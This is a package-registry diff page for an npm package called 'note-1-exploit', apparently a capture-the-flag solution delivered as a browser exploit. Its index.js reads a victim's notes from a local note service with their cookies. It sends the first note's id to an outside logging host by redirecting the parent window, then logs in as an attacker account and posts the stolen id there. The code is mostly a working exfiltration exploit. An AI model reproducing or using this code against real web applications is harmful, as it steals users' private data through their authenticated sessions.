npm - note-1-exploit - Versions diffs - 1.0.15 → 1.0.16 - Mend

note-1-exploit 1.0.15 → 1.0.16

Files changed (2) hide show

package/index.js +0 -38
package/package.json +1 -1

package/index.js CHANGED Viewed

@@ -1,14 +1,5 @@
 async function exploit() {
-    window.parent.location.replace("https://omniman.free.beeceptor.com?q=hahaha")
     let all_results = await fetch("http://127.0.0.1:10082/api/notes/all", {
-        "headers": {
-            "accept": "*/*",
-            "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
-            "sec-gpc": "1"
-        },
-        "referrer": "http://127.0.0.1:10082/",
-        "referrerPolicy": "strict-origin-when-cross-origin",
-        "body": null,
         "method": "GET",
         "mode": "cors",
         "credentials": "include"
@@ -17,33 +8,12 @@ async function exploit() {
     let note_name = (Math.random() + 1).toString(36).substring(7);
     window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + json_results[0].id)
     await fetch("http://127.0.0.1:10082/login", {
-        "headers": {
-            "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
-            "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
-            "cache-control": "max-age=0",
-            "content-type": "application/x-www-form-urlencoded",
-            "sec-gpc": "1",
-            "upgrade-insecure-requests": "1"
-        },
-        "referrer": "http://127.0.0.1:10082/login",
-        "referrerPolicy": "strict-origin-when-cross-origin",
         "body": "username=nnnddd&password=nnnddd",
         "method": "POST",
-        "mode": "cors",
         "redirect": "follow",
         "credentials": "include"
     });
     await fetch("http://127.0.0.1:10082/login", {
-        "headers": {
-            "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/127.0.0.1:10082p,image/apng,*/*;q=0.8",
-            "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
-            "cache-control": "max-age=0",
-            "content-type": "application/x-www-form-urlencoded",
-            "sec-gpc": "1",
-            "upgrade-insecure-requests": "1"
-        },
-        "referrer": "http://127.0.0.1:10082/login",
-        "referrerPolicy": "strict-origin-when-cross-origin",
         "body": "username=nnnddd&password=nnnddd",
         "method": "POST",
         "mode": "cors",
@@ -51,14 +21,6 @@ async function exploit() {
         "credentials": "include"
     });
     await fetch("http://127.0.0.1:10082/api/notes", {
-        "headers": {
-            "accept": "*/*",
-            "accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
-            "content-type": "application/json",
-            "sec-gpc": "1"
-        },
-        "referrer": "http://127.0.0.1:10082/",
-        "referrerPolicy": "strict-origin-when-cross-origin",
         "body": "{\"title\":\"" + note_name + "\",\"content\":\"" + json_results[0].id + "\"}",
         "method": "POST",
         "mode": "cors",

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "note-1-exploit",
-  "version": "1.0.15",
+  "version": "1.0.16",
   "description": "give me the flag",
   "main": "index.js",
   "scripts": {